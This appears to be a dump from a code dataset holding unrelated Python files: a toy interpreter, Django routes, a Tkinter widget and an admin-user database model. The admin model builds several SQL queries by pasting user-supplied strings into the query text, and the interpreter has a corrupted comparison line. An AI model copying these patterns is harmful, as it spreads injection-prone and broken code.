a\n\t\n\n\nclass Cond(IfelseStmt):\n\tdef __init__(self,s):\n\t\tself.cond=s.split()\n\n\t\tif self.cond[1].find(\">\") >=0:\n\t\t\texp1,exp2=self.cond[1].split(\">\")\n\t\t\tself.exp1=Expression.build(exp1)\n\t\t\tself.exp2=Expression.build(exp2)\n\t\t\n\t\tif self.cond[1].find(\"<\") >=0:\n\t\t\texp1,exp2=self.cond[1].split(\"<\")\n\t\t\tself.exp1=Expression.build(exp1)\n\t\t\tself.exp2=Expression.build(exp2)\n\t\t\n\t\tif self.cond[1].find(\"==\") >=0:\n\t\t\texp1,exp2=self.cond[1].split(\":=\")\n\t\t\tself.exp1=Expression.build(exp1)\n\t\t\tself.exp2=Expression.build(exp2)\n\t\t\n\t\tif self.cond[1].find(\"!=\") >=0:\n\t\t\texp1,exp2=self.cond[1].split(\"!=\")\n\t\t\tself.exp1=Expression.build(exp1)\n\t\t\tself.exp2=Expression.build(exp2)\n\t\n\tdef eval(self,state):\n\t\tif self.cond[1].find(\">\") >=0:\n\t\t\treturn self.exp1.eval(state)>self.exp2.eval(state)\n\t\tif self.cond[1].find(\"<\") >=0:\n\t\t\treturn self.exp1.eval(state)=0:\n\t\t\treturn self.exp1.eval(state)==self.exp2.eval(state) \n\t\tif self.cond[1].find(\"!=\") >=0:\n\t\t\treturn self.exp1.eval(state)!=self.exp2.eval(state) \n\n\n\nclass AsgnStmt(Stmt):\n\tdef __init__(self,s):\n\t\t#print(s)\n\t\tvar,exp=s.split(\"=\")\n\t\tself.var=var.strip()\n\t\tself.exp=Expression.build(exp)\n\n\tdef eval(self,state):\n\t\tstate[self.var]=self.exp.eval(state)\n\nclass printStmt(Stmt):\n\tdef __init__(self,s):\n\t\tk=s.split()\n\t\tself.exp=Expression.build(k[1].strip(\";\"))\n\n\tdef eval(self,state):\n\t\tprint(self.exp.eval(state),end=' ')\n\nclass printlnStmt(Stmt):\n\tdef __init__(self,s):\n\t\tk=s.split()\n\t\tself.exp=Expression.build(k[1].strip(\";\"))\n\n\tdef eval(self,state):\n\t\tprint(self.exp.eval(state))\n\nclass Expression:\n\tdef build(s):\n\t\ts=s.strip()\n\t\t#print(s)\n\t\tif s.find(\"+\") >=0:\n\t\t\treturn PlusExp(s)\n\t\telif s.find(\"-\") >=0:\n\t\t\treturn SubExp(s)\n\t\telif s.find(\"*\") >=0:\n\t\t\treturn MulExp(s)\n\t\telif s.find(\"/\") >=0:\n\t\t\treturn DivExp(s)\n\t\telif s.find(\"(\")<0 & s[0].isalpha():\n\t\t\treturn VarExp(s)\n\t\telif s.find(\"\\\"\")>=0:\n\t\t\treturn StringExp(s)\n\t\telif s.find(\"(\") >=0:\n\t\t\treturn funcExp(s)\n\t\telse:\n\t\t\treturn ConstExp(s)\n\nclass funcExp(Expression):\n\tdef __init__(self, s):\n\t\tself.var= s.strip()\n\n\tdef eval(self,newstate):\n\t\t#print(state[self.var])\n\t\treturn self.var.eval(newstate)\n\nclass 
ConstExp(Expression):\n\tdef __init__(self,s):\n\t\tself.value=int(s)\n\n\tdef eval(self,s):\n\t\treturn self.value\n\nclass VarExp(Expression):\n\tdef __init__(self, s):\n\t\tself.var= s.strip()\n\n\tdef eval(self,state):\n\t\t#print(state[self.var])\n\t\treturn state[self.var]\n\nclass StringExp(Expression):\n\tdef __init__(self, s):\n\t\tself.var= s.strip(\"\\\"\")\n\n\tdef eval(self,state):\n\t\t#print(state[self.var])\n\t\treturn self.var\n\nclass PlusExp(Expression):\n\tdef __init__(self, s):\n\t\tl,r=s.split(\"+\")\n\t\tself.l=Expression.build(l)\n\t\tself.r=Expression.build(r)\n\n\tdef eval(self,state):\n\t\treturn self.l.eval(state)+self.r.eval(state)\n\nclass SubExp(Expression):\n\tdef __init__(self, s):\n\t\tl,r=s.split(\"-\")\n\t\tself.l=Expression.build(l)\n\t\tself.r=Expression.build(r)\n\n\tdef eval(self,state):\n\t\treturn self.l.eval(state)-self.r.eval(state)\n\nclass MulExp(Expression):\n\tdef __init__(self, s):\n\t\tl,r=s.split(\"*\")\n\t\tself.l=Expression.build(l)\n\t\tself.r=Expression.build(r)\n\n\tdef eval(self,state):\n\t\treturn self.l.eval(state)*self.r.eval(state)\n\nclass DivExp(Expression):\n\tdef __init__(self, s):\n\t\tl,r=s.split(\"/\")\n\t\tself.l=Expression.build(l)\n\t\tself.r=Expression.build(r)\n\n\tdef eval(self,state):\n\t\treturn self.l.eval(state)/self.r.eval(state)\n\n\nif __name__=='__main__':\n\ttoycode=sys.argv[1]\n\tfile=open(toycode)\n\tcharacters=file.read()\n\tfile.close()\n\ta={}\n\ta=characters.strip().split(\"\\n\")\n\ta=list(filter(None, a))\n\t#print(a)\np=program(a)\nstate={}\np.eval(state)\n#print(state)\n\t\t\n\t\t\n\t","sub_path":"V2.py","file_name":"V2.py","file_ext":"py","file_size_in_byte":7177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"245303006","text":"from django.urls import path\n\nimport api.views.general as api\nimport web.apps.web_copo.repos.figshare as figshare\nimport web.apps.web_copo.rest.EnaRest as rest\nimport web.apps.web_copo.views as views\nimport api.annotate_views as a_views\nimport web.apps.web_copo.wizard_views as wizard\nimport submission.submissionDelegator as submit\nimport web.apps.web_copo.utils.ajax_handlers as ajax\nfrom web.apps.web_copo.rest.EnaRest import CopoChunkedUploadCompleteView, CopoChunkedUploadView\n\nimport submission.sword_utils as su\n\napp_name = 'rest'\n\nurlpatterns = [\n path('data_wiz/', wizard.data_wiz, name='data_wiz'),\n path('sample_wiz/', wizard.sample_wiz, name='sample_wiz'),\n path('receive_data_file/', rest.receive_data_file, name='receive_data_file'),\n path('receive_data_file_chunked/', CopoChunkedUploadView.as_view(), name='receive_data_file'),\n path('complete_upload/', CopoChunkedUploadCompleteView.as_view(), name='complete_data_file'),\n path('hash_upload/', rest.hash_upload, name='hash_upload'),\n path('inspect_file/', rest.inspect_file, name='inspect_file'),\n path('zip_file/', rest.zip_file, name='zip_file'),\n path('check_figshare_credentials/', figshare.check_figshare_credentials, name='check_figshare_credentials'),\n path('set_figshare_credentials/', figshare.set_figshare_credentials, name='set_figshare_credentials'),\n path('small_file_upload/', api.upload_to_figshare_profile, name='receive_data_file'),\n path('forward_to_figshare/', wizard.forward_to_figshare, name='forward_to_figshare'),\n path('get_upload_information/', ajax.get_upload_information, name='get_upload_information'),\n path('get_submission_status/', ajax.get_submission_status, name='get_submission_status'),\n path('submit_to_repo/', 
submit.delegate_submission, name='delegate_submission'),\n path('release_ena_study/', ajax.release_ena_study, name='release_ena_study'),\n #path('test_submission/', views.test_submission, name='test_ena_submission'),\n path('resume_chunked/', rest.resume_chunked, name='resume_chunked'),\n path('get_partial_uploads/', rest.get_partial_uploads, name='get_partial_uploads'),\n path('save_ss_annotation', a_views.save_ss_annotation, name='save_ss_annotation'),\n path('delete_ss_annotation/', a_views.delete_ss_annotation, name='delete_ss_annotation'),\n path('copo_get_submission_table_data/', views.copo_get_submission_table_data, name='get_submissions'),\n path('get_accession_data/', ajax.get_accession_data, name='get_accession_data'),\n path('set_session_variable/', ajax.set_session_variable, name='set_session_variable'),\n path('test_sword/', su.test_module, name='test_module'),\n path('call_get_dataset_details/', ajax.get_dataset_details, name='call_get_dataset_details'),\n path('samples_from_study/', ajax.get_samples_for_study, name='get_samples_for_study'),\n path('get_users/', ajax.get_users, name='get_users'),\n path('get_ontologies/', ajax.get_ontologies, name='get_ontologies'),\n path('export_generic_annotation/', ajax.export_generic_annotation, name='export_generic_annotation')\n]\n","sub_path":"web/apps/web_copo/rest_urls.py","file_name":"rest_urls.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"198613422","text":"\"\"\" Tests for reshape function in linear_modeling module\n\nRun with:\n\n nosetests test_reshape.py\n\"\"\"\n\nimport numpy as np\n\nfrom linear_modeling import reshape\n\nfrom nose.tools import assert_equal\n\nfrom numpy.testing import assert_almost_equal, assert_array_equal\n\n\n\ndef test_reshape():\n # We make a fake 4D image\n shape_3d = (2, 3, 4)\n V = np.prod(shape_3d)\n T = 10 # The number of 3D volumes\n # Make a 2D array that we will reshape to 4D\n arr_2d = np.random.normal(size=(V, T))\n differences = np.diff(arr_2d, axis=1)\n exp_rms = np.sqrt(np.mean(differences ** 2, axis=0))\n # Reshape to 4D and run function\n arr_4d = np.reshape(arr_2d, shape_3d + (T,))\n actual_rms = vol_rms_diff(arr_4d)\n assert_almost_equal(actual_rms, exp_rms)\n","sub_path":"code/utils/linear_modeling/test_reshape.py","file_name":"test_reshape.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"567826320","text":"# -*- coding: utf-8 -*-\n\"\"\"Webhook module.\"\"\"\n\n\nclass Source(object):\n def __init__(self, source):\n self.type = source['type']\n self.userId = source['userId']\n\n\nclass Message(object):\n def __init__(self, message):\n self.id = message['id']\n self.type = message['type']\n self.text = message['text']\n\n\nclass Events(Source, Message):\n def __init__(self, events):\n self.replyToken = events['replyToken']\n self.type = events['type']\n self.timestamp = events['timestamp']\n self.source = Source(events['source'])\n self.message = Message(events['message'])\n\n\nclass Postback(object):\n def __init__(self, postback):\n self.data = postback['data']\n\n\nclass ActionEvents(Postback, Source):\n def __init__(self, events):\n self.replyToken = events['replyToken']\n self.type = events['type']\n self.source = Source(events['source'])\n self.postback = Postback(events['postback'])\n\n\nclass UserProfile(object):\n def __init__(self, profile):\n self.displayName = 
profile['displayName']\n self.userId = profile['userId']\n self.pictureUrl = profile['pictureUrl']\n self.statusMessage = profile['statusMessage']\n","sub_path":"modules/webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"379541755","text":"from sqlalchemy import Column, Boolean, Integer, Numeric, String\nfrom ..base_type import Activity, ActivityMixin\n\ndisplay_name = 'Visit'\nsidebar_icon = 'fa-globe'\n\nckwargs = dict(nullable=False, default=False, server_default='f')\nclass Visit(ActivityMixin, Activity):\n country = Column(String, info=dict(label='Country'))\n f_seminar = Column(Boolean, info=dict(\n label='Seminar presentation',\n short='Seminar'\n ), **ckwargs)\n f_worked = Column(Boolean, info=dict(\n label='Worked with faculty',\n short='Faculty'\n ), **ckwargs)\n ndays = Column(Integer, nullable=False, server_default='1', info=dict(label='# Days'))\n\n public_disclosure = True\n\n HTML_COLUMNS = [\n 'date',\n 'name',\n 'country',\n 'f_seminar',\n 'f_worked',\n 'ndays'\n ]\n\n XLSX_COLUMNS = HTML_COLUMNS + ['freetext']\n\n def __str__(self):\n return \"{} {}\".format(self.name, self.date.strftime('%Y'))\n","sub_path":"shof/activity/activities/types/visit.py","file_name":"visit.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"388683018","text":"from InstUserLabel import *\nfrom tkinter import *\n\nclass UserTable(Frame):\n def add_label(self, userLabel):\n self.users.append(userLabel)\n self.show_slaves()\n\n def add_user(self, name):\n try:\n userLabel = UserLabel(name = name, master = self)\n self.users.append(userLabel)\n self.show_slaves()\n except UsernameError:\n self.errorCount += 1\n print('Error')\n\n def __init__(self, *users, height = 400, master = None):\n self.errorCount = 0\n Frame.__init__(self, master = master, height = height, width = 440, bg = 'light blue')\n self.focus()\n self.users = []\n self.dy = 0\n self.height = height\n for user in users:\n self.add_user(user)\n\n def scroll(event):\n self.dy = self.dy -event.delta/120*20\n print(self.dy)\n self.show_slaves()\n\n def move(e):\n shift = 0\n print(e.keysym)\n if e.keysym == 'Up':\n shift = self.dy + 20\n elif e.keysym == 'Down':\n shift = self.dy - 20\n elif e.keysym == 'Home':\n shift = 0\n elif e.keysym =='End':\n shift = -self.users.__len__()*60 + self.height - 10\n elif e.keysym == 'Prior':\n shift = self.dy + self.height\n elif e.keysym == 'Next':\n shift = self.dy - self.height\n self.dy = shift\n self.dy = min(self.dy, 0)\n self.dy = max(self.dy, -self.users.__len__()*60 + self.height - 10)\n if (self.users.__len__()*60 < self.height):\n self.dy = 0\n print(self.dy)\n self.show_slaves()\n\n self.bind('', scroll)\n self.bind('', move)\n self.bind('', move)\n self.bind('', move)\n self.bind('', move)\n self.bind('', move)\n self.bind('', move)\n\n def show_slaves(self):\n num = 0\n for ulabel in self.users:\n num += 1\n ulabel.place(x = 20, y = (num - 1) * 60 + 10 + self.dy)\n\n def place(self, **kw):\n Frame.place(self, kw)\n self.show_slaves()\n\n def pack(self, **kw):\n Frame.pack(self, kw)\n self.show_slaves()\n\n def sort_by_rating(self):\n self.users.sort(key = lambda user: -user.rating())\n 
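# (reviewer note, added) re-place the labels so the new descending-by-rating order becomes visible\n        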
self.show_slaves()\n","sub_path":"InstRoamer/InstUserTable.py","file_name":"InstUserTable.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"625909550","text":"# -*- coding: utf-8 -*-\n\nfrom model.BaseModel import BaseModel\nfrom model.ErrorLogModel import ErrorLogModel\nimport math, time, traceback\nfrom tornado.options import define, options\n\n'''\n 管理员管理\n'''\n\nclass AdminUserModel(BaseModel):\n '''\n 根据用户名查询管理员信息\n '''\n def findAdminUserByUsername( self , username ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"select * from `%srbac_admin` where username = '%s'\" % ( options.MYSQL_PREFIX , username )\n adminuser = model.find(cursor, sql)\n \n return adminuser\n\n '''\n 根据用户ID查询用户信息\n '''\n def findAdminUserByAdminid( self , adminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"select * from `%srbac_admin` where id = %d\" % ( options.MYSQL_PREFIX , adminId )\n adminuser = model.find(cursor, sql)\n \n return adminuser\n\n '''\n 更新管理员信息\n '''\n def updateAdminByAdminId( self , nickname , email , error_times , status , pwd , salt , AdminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET nickname = %s , email = %s , error_times = %s , status = %s , password = %s , salt = %s WHERE id = %s\"\n try:\n cursor.execute(sql,( nickname , email , error_times , status , pwd , salt , AdminId ))\n conn.commit()\n\n return (True,None)\n except (Exception) as e:\n conn.rollback()\n errorModel = ErrorLogModel()\n errorModel.addErrorLog( 'SYS-SQL_ERROR' , \"修改管理员信息失败:\" + e.__str__() , 1 )\n\n return (False , e)\n\n '''\n 查询全部管理员\n '''\n def findAllAdminUser( self , username , nickname , mail , curpage , pagesize = 20):\n query = '1'\n if len(nickname) > 0:\n query += \" AND nickname LIKE '%%%s%%'\" % nickname\n if len(username) > 0:\n query += \" AND username LIKE '%%%s%%'\" % username\n if len(mail) > 0:\n query += \" AND email LIKE '%%%s%%'\" % mail\n\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n countsql = \"select COUNT(id) as num from `%srbac_admin` where %s\" % ( options.MYSQL_PREFIX , query )\n res = model.find(cursor, countsql)\n adminuser_count = res['num']\n page_count = math.ceil( adminuser_count / pagesize )\n curpage = min( page_count , curpage )\n sql = \"select id,nickname,username,email,status,role_id,role_str,level_str,level,name,sex,birthday from `%srbac_admin` where %s ORDER BY id ASC LIMIT %d,%d \" % ( options.MYSQL_PREFIX , query , max((curpage-1),0) * pagesize , pagesize )\n adminuser_items = model.findAll(cursor, sql)\n\n return {\n 'itemcount' : adminuser_count,\n 'pagecount' : page_count,\n 'curpage' : curpage,\n 'pagesize' : pagesize,\n 'items' : adminuser_items\n }\n\n '''\n 根据邮箱查询管理员信息\n '''\n def findAdminUserByEmail( self , email ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = 
model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"select * from `%srbac_admin` where email = '%s'\" % ( options.MYSQL_PREFIX , email )\n adminuser = model.find(cursor, sql)\n \n return adminuser\n\n '''\n 查询管理员的mac列表,新mac地址需要验证email\n '''\n def findAdminMacListByAdminId( self , adminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"select * from `%srbac_admin_mac_list` where admin_id = %d\" % ( options.MYSQL_PREFIX , adminId )\n maclist = model.findAll(cursor, sql)\n \n return maclist\n\n '''\n 更新管理员昵称/邮箱/职务/职务级别/生日/姓名/性别\n '''\n def updateAdminUserNickname( self , adminId , nickname , email , level_str , level , birthday , name , sex):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET nickname = %s , email = %s , level_str = %s , level = %s , birthday = %s , name = %s , sex = %s WHERE id = %s\"\n try:\n cursor.execute(sql,( nickname , email , level_str , level , birthday , name , sex , adminId ))\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n errorModel = ErrorLogModel()\n errorModel.addErrorLog( 'SYS-SQL_ERROR' , \"修改管理员昵称邮箱失败:\" + e.__str__() , 1 )\n\n return (False , e)\n \n '''\n 根据用户ID更新用户基础信息\n '''\n def updateAdminUserBaseInfo( self , adminId , admin ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET nickname = %s, email = %s, role_str = %s, name = %s, birthday = %s, sex = %s, level = %s, level_str = %s, address = %s, homde_address = %s, marital_status = %s, star = %s, bank_card = %s, political_status = %s, study_level = %s, study_cate = %s WHERE id = %s\"\n try:\n cursor.execute(sql,( admin['nickname'] , admin['email'] , admin['role_str'] , admin['name'] , admin['birthday'] , admin['sex'] , admin['level'] , admin['level_str'] , admin['address'] ,admin['homde_address'] ,admin['marital_status'] ,admin['star'] ,admin['bank_card'] ,admin['political_status'] ,admin['study_level'] ,admin['study_cate'] , adminId ))\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n errorModel = ErrorLogModel()\n print('修改管理员基础信息失败')\n print( e.__str__() )\n print('修改管理员基础信息失败!')\n errorModel.addErrorLog( 'SYS-SQL_ERROR' , \"修改管理员基础信息失败:\" + e.__str__() , 1 )\n\n return (False , e)\n\n '''\n 更新管理员状态\n '''\n def updateAdminUserStatus( self , adminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET status = !status WHERE id = %d\" % ( adminId )\n try:\n cursor.execute(sql)\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n \n return (False , e)\n\n '''\n 新增用户\n '''\n def addAdminUser( self , member ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"INSERT INTO `\"+ options.MYSQL_PREFIX +\"rbac_admin` (username,nickname,salt,status,password,error_times,email,level_str,level,birthday,name,sex) 
VALUES (%s,%s,%s,%s,%s,0,%s,%s,%s,%s,%s,%s)\" \n params = ( member['username'] , member['nickname'] , member['salt'] , member['status'] , member['password'] , member['email'] , member['level_str'] , member['level'] , member['birthday'] , member['name'] , member['sex'] )\n\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n \n return (False , e)\n\n '''\n 更新后台用户连续登录错误次数\n iserror 是否错误登录\n '''\n def updateAdminLoginErrorTimes( self , adminId , iserror = False ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n if iserror == True:\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET error_times = error_times + 1 WHERE id = %d\" % ( int( adminId ) )\n else :\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET error_times = 0 WHERE id = %d\" % ( int( adminId ) )\n cursor.execute(sql)\n conn.commit()\n\n return True\n\n '''\n 添加用户日志\n '''\n def addAdminLog( self , uid , log , ip , tokenstr , header ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"INSERT INTO `\"+ options.MYSQL_PREFIX +\"rbac_admin_log` (create_date,uid, body, ip, token_str, header) VALUES (unix_timestamp(now()),%s,%s,%s,%s,%s)\"\n params = ( uid , log , ip , tokenstr , header )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , e)\n\n '''\n 查找管理员日志\n '''\n def findAdminLog( self , curpage , pagesize , uid = 0 , kw = '' , username = '' , nickname = ''):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n whereStr = ''\n if uid > 0:\n whereStr = \" WHERE logtable.uid = %d AND logtable.body LIKE '%%%s%%'\" % ( uid , kw )\n elif nickname != '' or username != '':\n whereStr = \" WHERE utable.username LIKE '%%%s%%' AND utable.nickname LIKE '%%%s%%' AND logtable.body LIKE '%%%s%%'\" % (username , nickname , kw)\n else:\n whereStr = \" WHERE logtable.body LIKE '%%%s%%'\" % ( kw )\n countSql = \"SELECT COUNT(*) AS num FROM `%srbac_admin_log` AS logtable LEFT JOIN `%srbac_admin` AS utable ON utable.id = logtable.uid %s\" % ( options.MYSQL_PREFIX , options.MYSQL_PREFIX , whereStr )\n _res = model.find(cursor, countSql)\n itemcount = int( _res['num'] )\n pagecount = math.ceil( itemcount / pagesize )\n sql = \"SELECT logtable.id,logtable.uid,logtable.body,logtable.ip,logtable.header,utable.nickname,utable.username,FROM_UNIXTIME(logtable.create_date,'%%Y-%%m-%%d %%H:%%i:%%S') AS logdate FROM `%srbac_admin_log` AS logtable LEFT JOIN `%srbac_admin` AS utable ON utable.id = logtable.uid %s ORDER BY logtable.id DESC LIMIT %d,%d\" % ( options.MYSQL_PREFIX , options.MYSQL_PREFIX , whereStr , (curpage - 1) * pagesize , pagesize )\n items = model.findAll( cursor , sql )\n\n return {\n 'itemcount' : itemcount,\n 'pagesize' : pagesize,\n 'pagecount' : pagecount,\n 'curpage' : curpage,\n 'items' : items\n }\n\n '''\n 删除后台用户\n '''\n def delAdminUserByAdminid( self , adminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"DELETE FROM `\"+ options.MYSQL_PREFIX +\"rbac_admin` WHERE id = %d\" % ( adminId )\n 
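# (reviewer note, added) adminId is interpolated straight into the SQL string above; passing it as a bound parameter, as the other queries in this class do, would be safer against SQL injection\n        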
try:\n cursor.execute(sql)\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n \n return (False , e)\n \n '''\n 更新用户权限\n '''\n def updateAdminUserRole( self , adminId , roleId , roleStr ):\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET role_id = %s , role_str = %s WHERE id = %s\"\n\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n try:\n cursor.execute(sql , ( roleId , roleStr , adminId ) )\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n print( '失败~~~' , e )\n return (False , e)\n\n '''\n 查找主题项目列表\n '''\n def findAdminThemeItem( self , themeId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"SELECT * FROM `%srbac_admin_theme_item` WHERE tid = %d ORDER BY sort ASC\" % (options.MYSQL_PREFIX, int( themeId ) )\n items = model.findAll( cursor , sql )\n\n return items\n\n '''\n 查找用户教育信息\n '''\n def findAdminStudy( self , uid):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"SELECT * FROM `%srbac_admin_study` WHERE uid = %d ORDER BY begin_date ASC\" % (options.MYSQL_PREFIX, int( uid ) )\n items = model.findAll( cursor , sql )\n\n return items\n\n '''\n 添加教育经历\n '''\n def addAdminStudy( self , uid , school_name , major_name , cate , begin_date , end_date ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"INSERT INTO `\"+ options.MYSQL_PREFIX +\"rbac_admin_study` (uid, school_name, major_name, cate, begin_date, end_date) VALUES ( %s,%s,%s,%s,%s,%s )\"\n params = ( uid , school_name , major_name , cate , begin_date , end_date )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , e)\n\n '''\n 查找用户工作信息\n '''\n def findAdminWork( self , uid):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"SELECT * FROM `%srbac_admin_work` WHERE uid = %d ORDER BY begin_date ASC\" % (options.MYSQL_PREFIX, int( uid ) )\n items = model.findAll( cursor , sql )\n\n return items\n\n '''\n 删除工作记录\n '''\n def delAdminWork( self , cid ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"DELETE FROM `\"+ options.MYSQL_PREFIX +\"rbac_admin_work` WHERE id = %s\"\n params = ( cid )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , e)\n\n '''\n 删除教育经历\n '''\n def delAdminStudy( self , cid ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"DELETE FROM `\"+ options.MYSQL_PREFIX +\"rbac_admin_study` WHERE id = %s\"\n params = ( cid )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , 
e)\n\n '''\n 添加工作经历\n '''\n def addAdminWork( self, uid, company, station_name, begin_date, end_date):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"INSERT INTO `\"+ options.MYSQL_PREFIX +\"rbac_admin_work` (uid, company, station_name, begin_date, end_date) VALUES ( %s,%s,%s,%s,%s )\"\n params = ( uid, company, station_name, begin_date, end_date )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , e)\n\n def findAdminUnreadMsg( self ):\n\n pass\n\n def findNotice( self ):\n\n pass\n\n def findImgAdr( self ):\n\n pass","sub_path":"pyapi/model/AdminUserModel.py","file_name":"AdminUserModel.py","file_ext":"py","file_size_in_byte":17417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"621596321","text":"# -*- coding: utf-8 -*-\nimport os\n\n\ndef get_files(dir, ext='csv'):\n for root, dirs, files in os.walk(dir):\n\n if len(files) == 0:\n print(\"no files found in {}\".format(dir))\n\n for file in files:\n if file.endswith(ext):\n yield os.path.join(root, file)\n","sub_path":"loader/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"119212967","text":"#!/usr/bin/env python\nfrom __future__ import print_function # emulates python3-esque\n# (and like every other freaking programming language that somewhat\n# resembles C) printing\n\n\"\"\"\nThis script will create a backup using rsync and a set of\ndirectories + configuration file built by the setup.py script in 